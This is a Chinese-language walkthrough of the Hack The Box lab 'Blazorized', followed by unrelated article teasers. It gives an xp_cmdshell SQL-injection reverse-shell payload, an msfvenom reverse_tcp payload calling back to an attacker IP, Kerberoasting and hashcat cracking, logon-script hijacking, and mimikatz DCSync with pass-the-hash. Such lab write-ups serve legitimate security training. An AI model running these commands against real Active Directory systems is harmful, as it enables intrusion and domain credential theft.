Hack The Box -- Blazorized

一、準備工作

端口掃描

詳細掃描

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-30 21:39 EDT
Nmap scan report for 10.10.11.22
Host is up (0.26s latency).PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-01 01:40:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-ntlm-info: 
|   10.10.11.22\BLAZORIZED: 
|     Target_Name: BLAZORIZED
|     NetBIOS_Domain_Name: BLAZORIZED
|     NetBIOS_Computer_Name: DC1
|     DNS_Domain_Name: blazorized.htb
|     DNS_Computer_Name: DC1.blazorized.htb
|     DNS_Tree_Name: blazorized.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2024-07-01T01:41:29+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-06-29T23:56:47
|_Not valid after:  2054-06-29T23:56:47
| ms-sql-info: 
|   10.10.11.22\BLAZORIZED: 
|     Instance name: BLAZORIZED
|     Version: 
|       name: Microsoft SQL Server 2022 RC0+
|       number: 16.00.1115.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RC0
|       Post-SP patches applied: true
|     TCP port: 1433
|_    Clustered: false
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49776/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+
|_ssl-date: 2024-07-01T01:41:29+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-06-29T23:56:47
|_Not valid after:  2054-06-29T23:56:47
| ms-sql-info: 
|   10.10.11.22:49776: 
|     Version: 
|       name: Microsoft SQL Server 2022 RC0+
|       number: 16.00.1115.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RC0
|       Post-SP patches applied: true
|_    TCP port: 49776
| ms-sql-ntlm-info: 
|   10.10.11.22:49776: 
|     Target_Name: BLAZORIZED
|     NetBIOS_Domain_Name: BLAZORIZED
|     NetBIOS_Computer_Name: DC1
|     DNS_Domain_Name: blazorized.htb
|     DNS_Computer_Name: DC1.blazorized.htb
|     DNS_Tree_Name: blazorized.htb
|_    Product_Version: 10.0.17763
52764/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (96%), Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 2004 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-07-01T01:41:16
|_  start_date: N/AOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.99 seconds

子域名爆破:Ffuf使用教程-CSDN博客

sudo gobuster dns -d blazorized.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -i

Web安全的最后一道防線:細談Gobuster的目錄/文件/Vhost/DNS子域名暴力破解藝術-騰訊云開發者社區-騰訊云 (tencent.com)

80端口

admin子域

445端口

沒見過的直接給度娘+gpt,既然是基于Blazor框架那就搜一搜Blazor的信息

文件尋找

搜了一通沒找到什么有用的(可能是我沒找到qwq)

直接上熊貓人翻js文件

全部點進去發現最終匯總為兩個js文件

http://blazorized.htb/_content/MudBlazor.Markdown/MudBlazor.Markdown.min.js

http://blazorized.htb/_framework/blazor.webassembly.js

看起來別扭可以美化一下JS解密,JS在線解密,JS加密解密,JS解密工具 (sojson.com)

http://blazorized.htb/_framework/blazor.webassembly.js 中存在一些json文件,min.js中是編碼文件并沒有找到其他路徑

訪問json文件可以得到一些dll文件?

還是不懂這些都干嘛的再次度娘+gpt

下載下來這些有關blazor的配置文件查看

http://blazorized.htb/_framework/Blazored.LocalStorage.dll

Blazored.LocalStorage.dll?? ?"sha256-5V8ovY1srbIIz7lzzMhLd3nNJ9LJ6bHoBOnLJahv8Go="
Blazorized.DigitalGarden.dll?? ?"sha256-YH2BGBuuUllYRVTLRSM+TxZtmhmNitErmBqq1Xb1fdI="
Blazorized.Shared.dll?? ?"sha256-Bz/iaIKjbUZ4pzYB1LxrExKonhSlVdPH63LsehtJDqY="

Blazorized.Helpers.dll?? ?"sha256-ekLzpGbbVEn95uwSU…pjosCK/fqqQRjGFUW0jAQQ="

jwt

下載后使用反編譯工具打開尋找過后可以發現jwt、安全密鑰、高權限用戶等

使用jwtSymmetricSecurityKey安全密鑰加密,hs512

?添加jwt,刷新進如入

二、進入后臺反彈shell

xp_cmdshell反彈shell拿下第一個flag

';exec master..xp_cmdshell 'powershell -e ' --+

滲透測試之內網攻防篇:使用 BloodHound 分析大型域內環境 - FreeBuf網絡安全行業門戶

curl上傳SharpHound.exe/SharpHound.ps1查看域內信息./SharpHound.exe -c all

msf彈回shell

生成shell文件反到msf上從msf下載,如果不適用msf則需要在向其中傳入curl.exe上傳回攻擊機

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.40 LPORT=9002?-f exe > shell.exe

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhostsetl portrun

msf中download所需要下載即可,上傳則upload

PowerView.ps1

將download的壓縮包直接導入bloodhound即可?

upload PowerView.ps1上傳,shell進入,以powershell環境執行ps1

Import-Module ./PowerView.ps1

三、SPN

執行命令

Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='tt/noc'}
Get-DomainSPNTicket -SPN tt/noc

獲取請求服務票據?

復制下來放在hashcat進行解密

難繃

本機下載hashcat使用Hashcat-Cheatsheet/README.md 在 master ·frizb/Hashcat-備忘單 (github.com)

hashcat -m 13100 hash.txt rockyou.txt -o found.txt --force

輸出到found.txt文件

登錄用戶

使用解密后的密文登錄主機

sudo evil-winrm -i blazorized.htb -p ' ' -u RSA_4810

進入后繼續上傳PowerView.ps1通過Get-NetUser查看信息

根據路徑尋找可執行權限

icacls查看A32FF3AEAA23此文件存在讀寫執行權限

反彈shell:

需要將編碼指定為ASCII可確保正確解釋批處理文件

'powershell -e base64 ' | Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\revshell.bat -Encoding ASCII

Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\shell.bat'

反彈shell

上傳shell文件反彈到msf進行操作

四、DCSync權限-->mimikatz x64

shell進入

啟動mimikatz.exe

獲取hash

lsadump::dcsync /domain:blazorized.htb /user:Administrator

ntml登錄為administrator

sudo evil-winrm -i blazorized.htb -H ’ ‘?-u Administrator

ps:Hack The Box-Blazorized-CSDN博客感謝師傅的博客sharphound的內容幫助了我感興趣的可以學習學習這個大佬的文章(我的sharphound查看kali會自動重啟)

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/42150.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/42150.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/42150.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Java后端開發(十三)-- Java8 stream的 orElse(null) 和 orElseGet(null)

orElse(null)表示如果一個都沒找到返回null。【orElse()中可以塞默認值。如果找不到就會返回orElse中你自己設置的默認值。】 orElseGet(null)表示如果一個都沒找到返回null。【orElseGet()中可以塞默認值。如果找不到就會返回orElseGet中你自己設置的默認值。】 區別就…

MyBatisPlus Service接口的繼承

介紹 Service接口 接口基礎了接口 IService&#xff0c;實現類實現就需要實現IService里的方法&#xff0c;但是MyBatisplus已經幫我們寫好了實現類&#xff0c;給我們的實現類繼承即可。 public interface IEmpService extends IService<Emp> { //其他業務方法.... }…

web學習筆記(八十)

目錄 1.小程序實現微信一鍵登錄 2. 小程序的授權流程 3.小程序配置vant庫 4.小程序配置分包 5.小程序配置獨立分包 6.小程序分包預下載 1.小程序實現微信一鍵登錄 要先實現小程序一鍵登錄首先我們需要給按鈕設置一個綁定事件&#xff0c;然后在綁定事件內部通過wx.login…

產品經理-工作流程及職能(6)

產品經理作為互聯網項目的主心骨&#xff0c;連接著團隊的所有成員&#xff08;開發、設計、運營、測試、市場等&#xff09; 用合理的產品規劃和清晰的產品愿景帶領大家前進&#xff0c;通過滿足用戶需求來創造屬于自己的商業利益。 在通常情況下&#xff0c;PM需要對整個產品…

大數據前沿技術分享——數據編織:現代數據管理的革命性方法

一、什么是數據編織&#xff1f; 數據編織&#xff08;Data Fabric&#xff09;是一種現代數據管理架構&#xff0c;旨在通過集成、管理和提供數據訪問來簡化復雜的數據環境。它利用自動化和智能技術&#xff0c;如機器學習和人工智能&#xff0c;來實現數據的無縫連接和統一視…

Yarn: 現代化的JavaScript包管理器

在JavaScript開發的世界里&#xff0c;包管理器是開發者不可或缺的工具。Yarn&#xff0c;由Facebook創建&#xff0c;是一個快速、可靠且安全的依賴管理工具&#xff0c;它為JavaScript應用程序提供了一個更高效的方式來處理包的安裝、更新和版本控制。本文將介紹Yarn的基本用…

刷題Day44|188.買賣股票的最佳時機IV、309.最佳買賣股票時機含冷凍期、714.買賣股票的最佳時機含手續費

188.買賣股票的最佳時機IV 188. 買賣股票的最佳時機 IV - 力扣&#xff08;LeetCode&#xff09; 思路&#xff1a;最多買賣k次&#xff0c;每次都有持有和不持有&#xff0c;所以下標最大到dp[i][2k]。 309.最佳買賣股票時機含冷凍期 309. 買賣股票的最佳時機含冷凍期 - 力…

百度智能云創新業務部總經理李想:發揮AI企業科技創新優勢 助力職業教育人才揚帆遠航

前言&#xff1a;百度智能云教育行業解決方案作為百度智能云旗下的創新力量&#xff0c;專注于培養“AI教育”領域的新質生產力人才&#xff0c;一直以來備受職業教育領域的關注。在第六屆人工智能“職教百強”院校長論壇開幕之際&#xff0c;中教全媒體對話論壇嘉賓百度智能云…

最新扣子(Coze)實戰案例:使用圖像流做超分,模糊圖片秒變清晰,完全免費教程

&#x1f9d9;?♂? 大家好&#xff0c;我是斜杠君&#xff0c;手把手教你搭建扣子AI應用。 &#x1f4dc; 本教程是《AI應用開發系列教程之扣子(Coze)實戰教程》&#xff0c;完全免費學習。 &#x1f440; 關注斜杠君&#xff0c;可獲取完整版教程。&#x1f44d;&#x1f3f…

當需要對大量數據進行排序操作時,怎樣優化內存使用和性能?

文章目錄 一、選擇合適的排序算法1. 快速排序2. 歸并排序3. 堆排序 二、數據結構優化1. 使用索引2. 壓縮數據3. 分塊排序 三、外部排序1. 多路歸并排序 四、利用多核和并行計算1. 多線程排序2. 使用并行流 五、性能調優技巧1. 避免不必要的內存復制2. 緩存友好性3. 基準測試和性…

區塊鏈技術如何改變供應鏈管理?

引言 供應鏈管理在現代商業中扮演著至關重要的角色&#xff0c;確保產品和服務從原材料到最終消費者的順利流轉。然而&#xff0c;當前的供應鏈管理面臨諸多挑戰&#xff0c;如信息不透明、數據篡改和效率低下等問題&#xff0c;這些問題嚴重制約了供應鏈的整體效能和可信度&am…

多模態圖像引導手術導航進展

**摘要&#xff1a;**對多模態圖像分割建模、手術方案決策、手術空間位姿標定與跟蹤、多模態圖像配準、圖像融合與顯示等多模態圖像引導手術導航的關鍵技術進行總結和分析&#xff0c;提出其進一步發展面臨的挑戰并展望其未來發展趨勢。 **外科手術的發展歷程&#xff1a;**從最…

簡單分享下python多態

目錄&#xff1a; 一、多態是啥嘞&#xff08;龍生九子各有不同&#xff0c;這就是多態&#xff09; 二、基礎的實例 三、多態的優勢與應用場景 四、深入理解 一、多態是啥嘞&#xff08;龍生九子各有不同&#xff0c;這就是多態&#xff09; 多態&#xff08;Polymorphism&…

ffmpeg 獲取視頻時長的命令及其輸出

要獲取視頻的時長&#xff0c;可以使用FFmpeg的-i參數&#xff0c;后跟視頻文件的路徑。下面是獲取視頻時長的命令示例&#xff1a; ffmpeg -i input.mp4輸出示例&#xff1a; Input #0, mov,mp4,m4a,3gp,3g2,mj2, from input.mp4:Metadata:major_brand : mp42minor_vers…

筆記14:程序中的循環結構

生活中的循環現象&#xff1a; -日復一日&#xff0c;年復一年 -春夏秋冬&#xff0c;四季交替 -周日&#xff0c;周一&#xff0c;周二&#xff0c;周三&#xff0c;周四&#xff0c;周五&#xff0c;周六 -人生是一個輪回&#xff0c;多年后&#xff0c;又會回到最初的原點 …

C++|哈希應用->布隆過濾器

目錄 一、概念 二、模擬實現 三、布隆過濾器擴展應用 上一篇章學習了位圖的使用&#xff0c;但它只適用于整數&#xff0c;對于要查詢字符串是否在不在&#xff0c;位圖并不能解決。所以針對這一問題&#xff0c;布隆過濾器可以派上用場&#xff0c;至于布隆過濾器是什么&am…

全球首款商用,AI為視頻自動配音配樂產品上線

近日&#xff0c;海外推出了一款名為Resona V2A的產品&#xff0c;這是全球首款商用視頻轉音頻 (V2A) 技術產品。這項突破性技術利用AI&#xff0c;僅憑視頻數據即可自動生成高質量、與上下文相關的音頻&#xff0c;包括聲音設計、音效、擬音和環境音&#xff0c;為電影制作人、…

linux內核開發之tftp服務搭建

TFTP (Trivial File Transfer Protocol) 是一個簡單的文件傳輸協議&#xff0c;通常用于在計算機網絡中進行文件傳輸。它是FTP的一個簡化版本&#xff0c;主要用于在局域網內部傳輸文件。 主要特點和用途&#xff1a; 簡單性&#xff1a; TFTP設計簡單&#xff0c;功能有限&am…

Hi3861 OpenHarmony嵌入式應用入門--TCP Server

本篇使用的是lwip編寫tcp服務端。需要提前準備好一個PARAM_HOTSPOT_SSID宏定義的熱點&#xff0c;并且密碼為PARAM_HOTSPOT_PSK LwIP簡介 LwIP是什么&#xff1f; A Lightweight TCP/IP stack 一個輕量級的TCP/IP協議棧 詳細介紹請參考LwIP項目官網&#xff1a;lwIP - A Li…

主流I/O模型總結

異步通知I/O模型(Windows) #include<string.h> #include<stdio.h> #include<WinSock2.h> #define BUF_SIZE 100 void CompressSockets(SOCKET hSockArr[], int idx, int total); void CompressEvent(WSAEVENT hEventArr[], int idx, int total); char msg[B…